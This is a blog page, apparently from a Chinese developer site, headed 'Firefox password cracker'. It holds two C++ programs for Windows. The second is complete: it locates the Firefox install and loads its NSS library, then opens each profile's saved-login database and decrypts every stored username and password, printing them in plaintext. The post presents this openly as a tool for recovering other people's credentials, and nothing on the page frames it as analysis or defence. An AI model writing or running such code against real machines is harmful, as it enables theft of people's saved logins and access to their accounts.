Firefox password cracker

最新推荐文章于 2022-04-18 16:54:01 发布
最新推荐文章于 2022-04-18 16:54:01 发布
阅读量872 收藏
点赞数

#include <windows.h>
#include <iostream>
using namespace std;


typedef enum SECItemType
{
    siBuffer = 0,
    siClearDataBuffer = 1,
    siCipherDataBuffer = 2,
    siDERCertBuffer = 3,
    siEncodedCertBuffer = 4,
    siDERNameBuffer = 5,
    siEncodedNameBuffer = 6,
    siAsciiNameString = 7,
    siAsciiString = 8,
    siDEROID = 9,
    siUnsignedInteger = 10,
    siUTCTime = 11,
    siGeneralizedTime = 12
};


struct SECItem
{
    SECItemType type;
    unsigned char *data;
    unsigned int len;
};
typedef enum SECStatus
{
    SECWouldBlock = -2,
    SECFailure = -1,
    SECSuccess = 0
};


typedef struct sqlite3 sqlite3;
typedef struct sqlite3_stmt sqlite3_stmt;
#define SQLITE_ROW         100
//Signature
#define SQLITE_API
typedef int(SQLITE_API *function)(const char *,sqlite3 **);
typedef int(SQLITE_API *function2)(sqlite3 *,const char *,int,sqlite3_stmt **,const char **);
typedef int(SQLITE_API *function3)(sqlite3_stmt *);
typedef const unsigned char *(SQLITE_API *function4)(sqlite3_stmt*,int);
typedef SECStatus (*function6)(const char *);
typedef SECStatus (*function7)(void);
//typedef SECItem(*function5)(char *,int,char **,int *);


/*SECStatus PK11_Decrypt(PK11SymKey *symkey,
CK_MECHANISM_TYPE mechanism, SECItem *param,
unsigned char *out, unsigned int *outLen,
unsigned int maxLen,
const unsigned char *enc, unsigned int encLen);*/


typedef unsigned long int CK_ULONG;
typedef CK_ULONG CK_MECHANISM_TYPE;
typedef struct PK11SymKeyStr PK11SymKey; /* defined in secmodti.h */
typedef SECStatus(*function5)(PK11SymKey *,CK_MECHANISM_TYPE,SECItem *,unsigned char *,unsigned int *,unsigned int,const unsigned char *,unsigned int);


void main(){
HMODULE dll = LoadLibrary("C:\\Users\\M\\Desktop\\nss3.dll");
if (dll){
cout<<"Loaded!\n";
function f1;
function2 f2;
function3 f3;
function4 f4;
function5 f5;
function6 f6;
function7 f7;


f1 = (function)GetProcAddress(dll,"sqlite3_open");
f2 = (function2)GetProcAddress(dll,"sqlite3_prepare_v2");
f3 = (function3)GetProcAddress(dll,"sqlite3_step");
f4 = (function4)GetProcAddress(dll,"sqlite3_column_text");
f6 = (function6)GetProcAddress(dll,"NSS_Init");
f7 = (function7)GetProcAddress(dll,"NSS_Shutdown");
//f5 = (function5)GetProcAddress(dll,"PK11_Decrypt");
sqlite3 *db;
sqlite3_stmt *statement;
int status = f1("C:\\Users\\M\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\m4wj8abp.default\\signons.sqlite",&db);
if (status == 0){
cout<<"OK"<<endl;
if(f2(db,"SELECT hostname,encryptedUsername,encryptedPassword from moz_logins;", -1, &statement, 0) == 0){
int result = 0;
while(true){
result = f3(statement);
if(result == SQLITE_ROW){ //while we stil have data in db
char *origin_url = (char*)f4(statement, 0);
char *password = (char *)f4(statement, 2);
char *username = (char *)f4(statement, 1);
cout<<"URL: "<<origin_url<<endl;
cout<<"Username: "<<username<<endl;
cout<<"Password: "<<password<<endl;
SECItem data;
data.data = (BYTE *)password;
data.len = strlen(password);
data.type = SECItemType::siCipherDataBuffer;
char buffer[1024];
unsigned int out;
//SECStatus re =  f5(NULL,0,&data,(BYTE *)buffer,&out,1024,(BYTE *)password,strlen(password));
}
else
break;
}
}
else
cout<<"db error!"<<endl;
}
else
cout<<"Error!\n";
FreeLibrary(dll);
}
cin.get();
}

//


#include <windows.h>

#include <Shlwapi.h>
#include <Shlobj.h>
#include <string>
#include <cstdio>
#include <conio.h>


#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "Shell32.lib")




#define NOMINMAX
#define PRBool   int
#define PRUint32 unsigned int
#define PR_TRUE  1
#define PR_FALSE 0
#define SQLITE_OK 0
#define SQLITE_ROW 100
#define SQLITE_API




typedef enum SECItemType {
    siBuffer = 0,
    siClearDataBuffer = 1,
    siCipherDataBuffer,
    siDERCertBuffer,
    siEncodedCertBuffer,
    siDERNameBuffer,
    siEncodedNameBuffer,
    siAsciiNameString,
    siAsciiString,
    siDEROID,
    siUnsignedInteger,
    siUTCTime,
    siGeneralizedTime
};


struct SECItem {
    SECItemType type;
    unsigned char *data;
    size_t len;
};


typedef enum SECStatus {
    SECWouldBlock = -2,
    SECFailure = -1,
    SECSuccess = 0
};




typedef struct PK11SlotInfoStr PK11SlotInfo;
typedef SECStatus(*NSS_Init) (const char *);
typedef SECStatus(*NSS_Shutdown) (void);
typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void);
typedef void(*PK11_FreeSlot) (PK11SlotInfo *);
typedef SECStatus(*PK11_Authenticate) (PK11SlotInfo *, PRBool, void *);
typedef SECStatus(*PK11SDR_Decrypt) (SECItem *, SECItem *, void *);
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_stmt sqlite3_stmt;
typedef int(SQLITE_API *fpSqliteOpen)(const char *, sqlite3 **);
typedef int(SQLITE_API *fpSqlitePrepare_v2)(sqlite3 *, const char *, int, sqlite3_stmt **, const char **);
typedef int(SQLITE_API *fpSqliteStep)(sqlite3_stmt *);
typedef const unsigned char *(SQLITE_API *fpSqliteColumnText)(sqlite3_stmt*, int);


PK11_GetInternalKeySlot PK11GetInternalKeySlot;
PK11_FreeSlot           PK11FreeSlot;
PK11_Authenticate       PK11Authenticate;
PK11SDR_Decrypt         PK11SDRDecrypt;
NSS_Init                fpNSS_INIT;
NSS_Shutdown            fpNSS_Shutdown;


fpSqliteOpen isqlite3_open;
fpSqlitePrepare_v2 isqlite3_prepare_v2;
fpSqliteStep isqlite3_step;
fpSqliteColumnText isqlite3_column_text;


char *dupcat(const char *s1, ...){
     int len;
     char *p, *q, *sn;
     va_list ap;


     len = strlen(s1);
     va_start(ap, s1);
     while (1) {
     sn = va_arg(ap, char *);
     if (!sn)
         break;
     len += strlen(sn);
     }
     va_end(ap);


     p = new char[len + 1];
     strcpy(p, s1);
     q = p + strlen(p);


     va_start(ap, s1);
     while (1) {
     sn = va_arg(ap, char *);
     if (!sn)
         break;
     strcpy(q, sn);
       q += strlen(q);
     }
     va_end(ap);


     return p;
}


char *installPath(){
    DWORD cbSize;
    char value[MAX_PATH];
    char *path = "SOFTWARE\\Mozilla\\Mozilla Firefox";
 
    cbSize = MAX_PATH;
    if (!SHGetValue(HKEY_LOCAL_MACHINE, "SOFTWARE\\Mozilla\\Mozilla Firefox", "CurrentVersion", 0, value, &cbSize)){
        path = dupcat(path,"\\",value,"\\Main",0);
        cbSize = MAX_PATH;
        if (!SHGetValue(HKEY_LOCAL_MACHINE, path, "Install Directory", 0, value, &cbSize)){
            int size = strlen(value)+1;
            char *ret = (char *)calloc(size,1);
            memcpy(ret,value,size);
            delete[]path;
            return ret;
        }
    }
    else
        return 0;
}


BOOL loadFunctions(char *installPath){
    if (installPath){
        char path[4096];
        DWORD dwError = GetEnvironmentVariable("PATH", path, 4096);
        char *newPath = path;
        newPath = dupcat(newPath,";",installPath,0);
 
        SetEnvironmentVariable("PATH", newPath);
        HMODULE hNSS = LoadLibrary((dupcat(installPath,"\\nss3.dll",0)));
        delete[]newPath;
 
        if (hNSS){
            fpNSS_INIT = (NSS_Init)GetProcAddress(hNSS, "NSS_Init");
            fpNSS_Shutdown = (NSS_Shutdown)GetProcAddress(hNSS, "NSS_Shutdown");
            PK11GetInternalKeySlot = (PK11_GetInternalKeySlot)GetProcAddress(hNSS, "PK11_GetInternalKeySlot");
            PK11FreeSlot = (PK11_FreeSlot)GetProcAddress(hNSS, "PK11_FreeSlot");
            PK11Authenticate = (PK11_Authenticate)GetProcAddress(hNSS, "PK11_Authenticate");
            PK11SDRDecrypt = (PK11SDR_Decrypt)GetProcAddress(hNSS, "PK11SDR_Decrypt");
            isqlite3_open = (fpSqliteOpen)GetProcAddress(hNSS, "sqlite3_open");
            isqlite3_prepare_v2 = (fpSqlitePrepare_v2)GetProcAddress(hNSS, "sqlite3_prepare_v2");
            isqlite3_step = (fpSqliteStep)GetProcAddress(hNSS, "sqlite3_step");
            isqlite3_column_text = (fpSqliteColumnText)GetProcAddress(hNSS, "sqlite3_column_text");
        }
        return !(!fpNSS_INIT || !fpNSS_Shutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot);
    }
    return FALSE;
}


char *Crack(char *s){
    BYTE byteData[8096];
    DWORD dwLength = 8096;
    PK11SlotInfo *slot = 0;
    SECStatus status;
    SECItem in, out;
    char *result = "";


    ZeroMemory(byteData, sizeof (byteData));


    if (CryptStringToBinary(s, strlen(s),CRYPT_STRING_BASE64, byteData, &dwLength, 0, 0)){
        slot = (*PK11GetInternalKeySlot) ();
        if (slot != NULL){
            status = PK11Authenticate(slot, PR_TRUE, NULL);
            if (status == SECSuccess){
                in.data = byteData;
                in.len = dwLength;
                out.data = 0;
                out.len = 0;
                status = (*PK11SDRDecrypt) (&in, &out, NULL);
                if (status == SECSuccess){
                    memcpy(byteData, out.data, out.len);
                    byteData[out.len] = 0;
                    result = ((char*)byteData);
                }
                else
                    result = "Error on decryption!";
            }
            else
                result = "Error on authenticate!";
            (*PK11FreeSlot) (slot);
        }
        else
            result = "Get Internal Slot error!";
    }
    return result;
}


void showDecryptedPasswords(){
    char path[MAX_PATH];
    char appData[MAX_PATH], profile[MAX_PATH];
    char sections[4096];
 
    SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, SHGFP_TYPE_CURRENT, appData);
    _snprintf_s(path, sizeof(path), _TRUNCATE, "%s\\Mozilla\\Firefox\\profiles.ini", appData);
    GetPrivateProfileSectionNames(sections, 4096, path);
    char *p = sections;
    
    while (1){
        if (_strnicmp(p, "Profile", 7) == 0) {
            GetPrivateProfileString(p, "Path", NULL, profile, MAX_PATH, path);
            _snprintf_s(path, sizeof(path), _TRUNCATE,"%s\\Mozilla\\Firefox\\Profiles\\%s", appData,std::string(profile).substr(std::string(profile).find_first_of("/") + 1).c_str());
 
            if (!(*fpNSS_INIT) (path)){
                char *database = dupcat(path,"\\signons.sqlite",0);
                //
                int intrari = 0;
                sqlite3 *db;
                if (isqlite3_open(database, &db) == SQLITE_OK) {
                    sqlite3_stmt *stmt;
                    char *query = "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins";
                    if (isqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
                        while (isqlite3_step(stmt) == SQLITE_ROW) {
                            char *user,*password,*site;
                            user = (char*)isqlite3_column_text(stmt, 0);
                            password = (char*)isqlite3_column_text(stmt, 1);
                            site = (char*)isqlite3_column_text(stmt, 2);
                            intrari++;


                            printf("Entry: %d\n",intrari);
                            printf("Site: %s\n",site);
                            printf("User: %s\n",Crack(user));
                            printf("Password: %s\n\n\n",Crack(password));
                        }
                        delete[]database;
                    }
                    else
                        printf("Can't prepare database!\n");
                }
                else
                    printf("Can't open database!\n");
                if (intrari == 0)
                    printf("No entries found in %s\n", database);
                (*fpNSS_Shutdown) ();
            }
            else
                printf("NSS_Init() error!\n");
        }
        p += lstrlen(p) + 1;
        if (p[0] == 0) break;
    }
}


void main(){
    char *path = installPath();
        if (loadFunctions(path)){
            //Lets see the credentials
            showDecryptedPasswords();
            free(path);
        }
        else
            printf("Can't find nss3.dll!\n");
    _getch();
}
gj333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
火狐查看密码_在Firefox中查看和删除存储的密码
culiuman3228的博客
09-02 771
火狐查看密码Firefox allows you to securely store usernames and passwords for websites in its Password Manager. When you visit one of the websites again, Firefox automatically fills in the username and passw...
浏览器密码存储原理和渗透中的利用
hpp24的专栏
11-29 4210
一、引言 我之前的文章中介绍了名为dumpmon的推特机器人,它监控着众多“贴码网站”的账户转储、配置文件和其他信息。自那以后,我一直留意着监测到的信息。接下来会有关于dumpmon的一系列文章,而本文则关注浏览器是如何存储密码的。 这里提到dumpmon,是因为我偶然发现一些贴码,比如这篇, 应该是感染在计算机上的恶意软件的日志。我便想:我总是认为最好不要让浏览器直接存储密码,但
混合密码系统设计代码c++实现_通过Network Security Services导出Firefox浏览器中保存的密码...
weixin_39862871的博客
12-04 301
0x00 前言在上一篇文章《渗透技巧——导出Firefox浏览器中保存的密码》介绍了导出Firefox浏览器密码的常用方法,其中firefox_decrypt.py使用NSS(Network Security Services)进行解密,支持key3.db和key4.db的Master Password解密。本文将要对其涉及的原理进行介绍,编写测试代码,实现对Master Passwo...
火狐浏览器如何查看网页记住保存的密码?
玩人工智能的辣条哥的博客
03-14 3284
环境: Windows 10企业版G 火狐浏览器98.0 问题描述: 我们在网页上保存了密码后使我们方便很多,就是时间长久容易忘记,今天来和大家分享一下如何查看网页保存的密码,网页忘记密码,●●●●●● 如何查看保存的密码? 解决方案: 1.按F12或者鼠标右键选择“检查”按钮,打开浏览器调试功能 2.选中密码处,找到下面修改“type=password” 3.把password直接修为“text”回车即可出现密码 ...
渗透讲解之Firefox密码导出篇
nimo观察者
04-18 2319
渗透讲解之Firefox密码导出篇
PDF Password Cracker绿色汉化版
07-12
PDF Password Cracker( PDF密码工具) 绿色汉化版 V2.2 有注册码
PDF密码破解PDF Password Cracker Pro v3.0
09-04
PDF Password Cracker Pro是一个专门破解加密PDF文件的实用工具,可以用来破解PDF文件的“所有者密码”,也可以用来破解用FileOpen插件加密的文件。破解后的PDF文件可以用各种PDF阅读器打开而无任何限制!
PDF Password Cracker (PDF密码工具) 绿色汉化版
09-15
破解已加密的PDF文档。
PDF Password Cracker 密码破解
11-22
处理pdf文件的加密,可以去除加密的密码 1、移除 PDF 密码和限制 ... 3、解密由所有者/主密。码保护的 PDF 文件 ... 4、您可以从输入的 PDF 文件移除被限制的功能(复制、打印、编辑、评论、页面提取等)
RAR Password Cracker V4.12 汉化版
04-04
RAR Password Cracker V4.12 汉化版可以用于破解已加密的RAR文件,你可以用自己的字典来解密。
get Firefox Passwords
05-18 1086
program decrypt; {$APPTYPE CONSOLE} uses Windows; procedure GetFirefoxPasswords; const FirefoxPath: string = C:/Program Files/Mozilla Firefox/; type TSECItem = packed record SECItemType: d
firefox 记住密码_Firefox Sync安全吗,也就是说,别人可以不用我的密码就能读取保存在Firefox中的我的密码吗?...
cuma2369的博客
07-28 550
firefox 记住密码Firefox needs an email address and a password to login and sync. Is Firefox Sync safe, that is, could someone else read my password saved in Firefox without my password? Firefox需要电子邮件地址和密码...
请看好你的firefox!别让它帮你泄密
lijie1051的专栏
02-03 548
很多人在访问网站的时候就喜欢使用浏览器记录密码的功能,以后访问网站就可以直接登录不用输入密码了,不过使用firefox的话就很可能就把你的密码完全暴露给他人,别人只需稍微用一下社会工程学就可以盗取你所有保存的密码了,如果你不信可以按照如下步骤看看你曾经保存过的密码:1. 打开你的FireFox,点击Edit - Preferences - Security, 点击Saved Password,
解决chrome、Firefox会密码框填充(type='password')问题
qq_43080569的博客
02-20 1322
我的项目使用的是elementUI,在做登录的时候遇到在chrome上密码框自动填充和手动填充的问题 chrome填充样式: 我们需要去掉这个烦人的东西, 网上说的解决办法:一部分加属性 auto-complete=“new-password” , 另一部分auto-complete=“off” ,但是这两种属性根本不起作用 然后 解决办法: 来了 使用 input 的属性 readonly 解决...
关于火狐浏览器记住密码的解决策略
等待,就是浪费青春,让代码改变世界
08-08 1937
对于谷歌浏览器而言,在input失去光标时,将input的readOnly属性设置为false,在获得光标时,再将readOnly属性设置为true,即可解决谷歌浏览器记住密码问题,而对于火狐浏览器,这样做依然无济于事,但是由此做法得出一个结论~在没有密码框的情况下,火狐浏览器是不会记住用户名信息的,所以终极解决方案如下: function replace_pwd(obj){ var _th...
Firefox 本地保存密码破解 (破解key3.db, signons.sqlite , key4.db, logins.json)
ShenZ的博客
08-05 3148
Firefox密码破解 登录密码信息存放位置 用户的Firefox各种配置文件存储在自己的Appdata\Roaming(%appdata%)目录下: C:\Users\admin\AppData\Roaming\Firefox\Profiles\<random text>.default\ 不同版本的Firefox浏览器,存放登录信息文件和存放密钥文件也不同,其中用到的加密方式也有少许不同: Firefox 版本 <32 (key3.db, signons.sqlite) Firef
firefox(火狐)使用自动填充记住的用户名密码时,会将密码填充到相同name的文本域解决办法...
05-08 449
常常选择让浏览器记住用户名和密码便于登录,但这样会导致浏览器将用户名密码写入到任何表单中name="password"这样的输入域中,不明白的人还以为中邪了。其实有一个html属性可以避免此问题。这就是autocomplete属性。 autocomplete="off|on" 要关闭浏览器自动补全的功能,就给input加上 autocomplete...
NSS 3.35 database文件操作方法变更
xunying6967的博客
09-12 346
configdir = PR_smprintf(“sql:%s”,oldconfigdir);//加入”sql:” rv = NSS_InitReadWrite(configdir); if (rv != SECSuccess) { goto fail; } slot = PK11_GetInternalKeySlot(); /* optional */...
navicat cracker
最新发布
09-29
Navicat Cracker 是一个用于破解 Navicat 软件的工具。根据引用中提供的信息,当使用 Navicat 162 版本时,可能会遇到注册无法成功的问题。错误提示中显示的信息指出问题出现在 NavicatCrackerDlg.cpp 文件的第332行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值